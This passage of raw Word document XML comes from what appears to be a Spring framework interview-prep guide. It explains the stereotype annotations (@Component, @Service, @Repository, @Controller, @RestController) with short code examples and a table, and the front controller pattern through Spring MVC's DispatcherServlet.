          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to manage transactions declaratively, making the code more maintainable and clean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D271AE"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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can configure rollback behavior, propagation levels, and isolation levels to suit different requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4860085C"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D9DD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108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D7CD84" w14:textId="373F499A" w:rsidR="00926509" w:rsidRPr="00CE4B95" w:rsidRDefault="00926509">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="_Toc197867666"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different stereotypes annotations in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w14:paraId="6A92D5DA" w14:textId="7E1579E2" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944"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Spring,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are a set of annotations that are used to define Spring beans or components. They help Spring to recognize and manage the different components or layers of an application. These annotations are part of Spring's </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism and are used to mark classes that will be automatically registered as Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E230223"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lastRenderedPageBreak/>
        <w:t>The key stereotype annotations in Spring are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015A872"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1. @Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EBEBF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mponent annotation is a generic stereotype used to define a Spring bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC73DD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ndicates that a class is a Spring component and can be auto-detected by Spring’s classpath scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B366C"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the most general-purpose annotation and can be used to define any Spring-managed bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1583894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23549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p w14:paraId="0140215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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144AA65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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC653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38240639"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2. @Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F97FA"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Service annotation is a specialization of @Component and is typically used to annotate service layer classes in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46463D1E"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defining service beans, which typically contain business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA385F0"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ough @Service does not add any specific functionality compared to @Component, it helps to indicate the role of the class in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F55FA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0681D2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p w14:paraId="6532F7A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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5361A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void createUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD67FB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 to create user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF4C8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2656B8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7EDCCB1"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3. @Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D28AC1"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pository annotation is a specialization of @Component and is typically used to annotate classes that interact with the database or data access layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021C988"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serves to indicate that the class is responsible for database interactions, typically through CRUD (Create, Read, Update, Delete) operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D41D2"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 also enables certain exception translation mechanisms in Spring, converting database-related exceptions into Spring’s unchecked DataAccessException hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1812DFD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272231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p w14:paraId="65C0491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pository {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC0C5E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methods for database access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74305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67041A4"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4. @Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9312F5"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annotation is a specialization of @Component used in the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web layer</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a Spring application (typically in a Spring MVC-based application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B2DCD"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to define a controller that handles web requests and returns responses to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328E16C"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ass annotated with @Controller typically contains methods that are mapped to web request paths via @RequestMapping or similar annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CBEC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0B10C5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1D66F9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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A8E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users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B20E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getUsers(Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFEEA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controller logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D401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List";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203BDB6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335D684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2175F51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5. @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548148C"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RestController annotation is a specialized version of @Controller used in </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful web services</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79492A9A"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building RESTful web services that provide data (usually in JSON format) over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BEF45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lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B14F6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p w14:paraId="6440F8E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stController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A0D9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GetMapping("/api/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50071E0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List&lt;User&gt; getUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1724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Service.getUsers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE49ED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03AE3EA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EA55385"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240"/>
        <w:gridCol w:w="3401"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="04DCC89F" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3781F58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Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FB4F837"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA303FD"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Used For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="689A8E4C" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="250928B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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6BF41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Generic annotation to define a Spring bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="277FB04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ny Spring-managed component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="27B2CAD7" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C51F924"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FCF93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service layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1956882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 classes containing business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="3D33C729" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="111C5F3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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="087CA06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data access layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3022AC2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Data access classes (DAO/Repository)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="0C174290" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066C4C0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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03AE9EF7"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web controllers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D1510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eb layer classes in Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C67DA" w:rsidRPr="000C67DA" w14:paraId="5C7C0E63" w14:textId="77777777" w:rsidTr="00DB1944">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736139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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73EC622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bination of @Controller and @ResponseBody for REST APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E7E407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 API controllers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E40E128"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3A0A72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se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109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425C864" w14:textId="493AEE46" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="002265DF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc197867667"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the front controller</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w14:paraId="28146D48" w14:textId="7E29205D" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE"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 design pattern used in web applications, particularly in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MVC (Model-View-Controller)</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Key Responsibilities of the Front Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527B4B7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ingle Entry Point</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It acts as a central controller that handles all incoming requests from the client (browser, API client, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0AA9A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Request Dispatching</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It dispatches requests to appropriate handlers, which can be other controllers, services, or business logic layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B904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Unified Control</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a centralized place for processing common tasks such as logging, authentication, authorization, and request preprocessing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B1CD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Forwarding Requests</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Front Controller forwards the request to the appropriate handler or view after processing, ensuring the separation of concerns between the web layer and business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DE8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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9D17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ient (such as a browser) sends an HTTP request to the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6F61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usually a central servlet or class) intercepts this request and processes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB9B0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checks the request and maps it to an appropriate handler or controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D686BF6"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passes the request to the handler or controller, where the actual business logic is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A028A3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ntroller returns a response (often a view or data in the case of REST), which the Front Controller forwards back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D559D"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Benefits of the Front Controller Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294A6EF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entralized Request Management</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All requests go through a single entry point, making it easier to manage and configure routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27907245"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de Reusability and Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Common tasks like logging, authentication, and authorization can be handled in one place rather than scattered across multiple controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7C87C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eparation of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Business logic, presentation logic, and request handling are decoupled and kept separate, improving the clarity and organization of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237288EF"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nsistent Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Error handling and exception management can be centralized in the Front Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFBFAFC"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lastRenderedPageBreak/>
        <w:t>Example in Spring MVC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD87E4D"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w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the DispatcherServlet acts as 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It intercepts all incoming HTTP requests and delegates them to appropriate controllers or handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872010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teps in Spring MVC Front Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F2896"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user sends a request (e.g., accessing /home).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE4ECA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DispatcherServlet (Front Controller) receives the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45581E6F"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consults the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine which controller should handle the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609458A5"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quest is passed to the correct controller, and the controller processes the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619A75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returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object, containing the model data and view name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113619BD"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uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to render the appropriate view (e.g., JSP or Thymeleaf template) and sends the response back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63862CAB"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C812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36A27CC5"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HomeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12996ABC" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="000C67DA" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A0679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home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3F083"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homePage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581EC2C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home";  // Returns "home.jsp" or "home.html" depending on the view resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24445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1D5F4A0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BA6ADE6"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n this case, the DispatcherServlet (the Front Controller) routes the /home request to the homePage() method in HomeController. It then resolves the view to render (such as home.jsp or home.html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A50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2DABD405" w14:textId="77777777" w:rsidR="001D3CAE" w:rsidRPr="00CE4B95" w:rsidRDefault="001D3CAE" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C79BBE6" w14:textId="3480DD19" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C9664F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="_Toc197867668"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
